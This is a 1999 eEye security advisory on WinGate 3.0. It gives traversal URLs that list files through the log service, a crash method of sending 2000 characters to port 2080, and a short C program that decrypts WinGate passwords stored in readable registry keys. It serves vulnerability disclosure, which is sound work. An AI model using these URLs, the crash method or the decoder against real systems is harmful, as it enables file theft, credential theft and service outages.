[INLINE] [INLINE]
   [INLINE] eEyelogosmall
   Home Hire News Alerts Articles Books Tools Links Contact Press 
   [INLINE] [INLINE] [INLINE]
   
   eEye - Digital Security Team Alert
   
   Multiple WinGate Vulnerabilites
   Systems Affected
   WinGate 3.0
   Release Date
   February 22, 1999
   Advisory Code
   AD02221999
   Description:
   WinGate 3.0 has three vulnerabilites.
   1. Read any file on the remote system.
   2. DoS the WinGate service.
   3. Decrypt WinGate passwords.
   Read any file on the remote system
   We were debating if we should add this to the advisory or not. We
   figured it would not hurt so here it is. The WinGate Log File service in the past has had holes were
   you can read any file on the system and the holes still seem to be there and some new ways of doing
   it have cropped up.
   http://www.server.com:8010/c:/ - NT/Win9x
   http://www.server.com:8010// - NT/Win9x
   http://www.server.com:8010/..../ - Win9x
   Each of the above urls will list all files on the remote machine.
   There are a few reasons why we were not sure if we were going to post this information.
   By default all WinGate services are set so that only 127.0.0.1
   can use the service. However the perpose is to let users remotely view the logs so therefore chances
   are people using the log file service are not going to be leaving it on 127.0.0.1. Also by default
   in the WinGate settings "Browse" is enabled. We are not sure if the developers intended the Browse
   option to mean the whole hard drive. We would hope not.
   The main reason we did put this in the advisory is the fact that
   the average person using WinGate (Cable Modem Users etc..) are not the brightest of people and they
   will open the Log Service so that everyone has access to it. We understand there are papers out
   there saying not to do this and even the program it self says not to, but the average person will
   not let this register in their head as a bad thing so the software should at least make it as secure
   as possible. Letting people read any file is not living to that standard. Anyways, lets move on...
   DoS the WinGate Service
   The Winsock Redirector Service sits on port 2080. When you connect to it and send 2000 characters
   and disconnect it will crash all WinGate services. O Yipee.
   Decrypt the WinGate passwords
   The registry keys where WinGate stores its passwords are insecure and let everyone read them.
   Therefore anyone can get the passwords and decrypt them. Code follows.
   // ChrisA@eEye.com
   // Mike@eEye.com
   #include "stdafx.h"
   #include <stdio.h>
   #include <string.h>
   main(int argc, char *argv[]) {
   char i;
   for(i = 0; i < strlen(argv[1]); i++)
   putchar(argv[1][i]^(char)((i + 1) << 1));
   return 0;
   }
   You get the idea...
   It is good that WinGate 3.0 by default locks down all services to
   127.0.0.1. However, there still seems to be holes were if one gets
   access to the WinGate service, non-blocked ip, they can do some damage. Chances are if you poke hard
   at some of the other services you will find similar problems as above.
   Vendor Status
   Contacted a month or so ago, have heard nothing. Someone from the NTSEC list contact
   eval-support@wingate.net with our findings and they were sent an email back rather quickly. We had
   sent our emails to support@wingate.net. Maybe all three of our emails just got lost.
   Copyright (c) 1999 eEye Digital Security Team
   
   Permission is hereby granted for the redistribution of this alert electronically. It is not to be
   edited in any way without express consent of eEye. If you wish to reprint the whole or any part of
   this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for
   permission.
   
   Disclaimer:
   
   The information within this paper may change without notice. Use of this information constitutes
   acceptance for use in an AS IS condition. There are NO warranties with regard to this information.
   In no event shall the author be liable for any damages whatsoever arising out of or in connection
   with the use or spread of this information. Any use of this information is at the user's own risk.
   
   Please send suggestions, updates, and comments to:
   
   eEye Digital Security Team
   
   info@eEye.com
   http://www.eEye.com
   [INLINE]
   [LINK] 
   [INLINE]
   
        Copyright © 1998-1999 eEye.com - All Rights Reserved. eEye is an www.eCompany.com Venture.